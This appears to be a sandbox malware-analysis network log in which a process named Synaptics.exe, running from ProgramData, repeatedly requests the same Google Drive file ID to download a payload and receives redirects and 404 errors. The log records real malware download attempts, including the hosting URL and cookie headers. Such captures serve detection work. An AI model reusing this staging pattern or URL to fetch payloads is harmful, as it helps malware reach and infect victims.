                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:45 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:45 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC6uQbRvQ_mArwzefTphklp4EikxjvR0vxCd2mY3cSX6sabwbDpr0YLTXuj4VffFgxhIgH71Ztk
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:45 GMT
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-uicQ30HIpBqie7gxRO_Qpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:45 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                        2024-12-30 10:48:45 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="8AkNfx-Jef750JD4kUN_Tg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                        2024-12-30 10:48:45 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        127 | 192.168.2.7 | 50168 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:45 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:46 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:46 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-MOoFktRPLtyMWS1BMLSBPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        128 | 192.168.2.7 | 50169 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:45 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:46 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC6PbHKft8ZQ3k_t87-dXBjrDxPHqOcxrAooUmNxwKYel9IiuUJQxKxs_5NMWq-ytNB1cEwBIvY
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:46 GMT
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-tTTDHQtVr1To0zHywZeH6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:46 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                        2024-12-30 10:48:46 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="ElKK7AUoZeL3EesvUHrHgQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                        2024-12-30 10:48:46 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        129 | 192.168.2.7 | 50170 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:46 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:46 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:46 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-VbdATu1s2SeUoiDGvbBJDg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        130 | 192.168.2.7 | 50171 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:46 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:46 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC7aibd1GG2-QVA15KhQXj5amG22_Aa0pWjmIBuxMDtRiHXSjJQsnVy-mWombofuSp6n
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:46 GMT
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-xSC4nDxN4HrGtznMxYs81w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:46 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:48:46 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="sR9yp9ufUDyjVJfsgMZFFg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:48:46 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
131 | 192.168.2.7 | 50172 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:46 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:47 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:46 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-4sNAfNMWPnZpWJ3uMbUYmw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
132 | 192.168.2.7 | 50173 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:46 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:47 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC5hkd2Ng6rGBPeBe76WDZHUbVbqN1mKgjKbNlTlOLEt_Qza5EDfYxFmz0UggB3Kn0mwO7I-0RM
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:47 GMT
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-49_Q46qm5ZCeUKK2mSlQyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:47 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:48:47 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="UoqoKK2859mVz-z-SRG0Mw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:48:47 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
133 | 192.168.2.7 | 50175 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:47 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
134 | 192.168.2.7 | 50174 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:47 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
135 | 192.168.2.7 | 50177 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:47 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
136 | 192.168.2.7 | 50179 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:48 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:48 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:48 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-9SkyBKXlsUAt7HAXgRYqng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
137 | 192.168.2.7 | 50180 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:48 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:48 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:48 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-35aVsTFcB35cSau3nmjAFw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
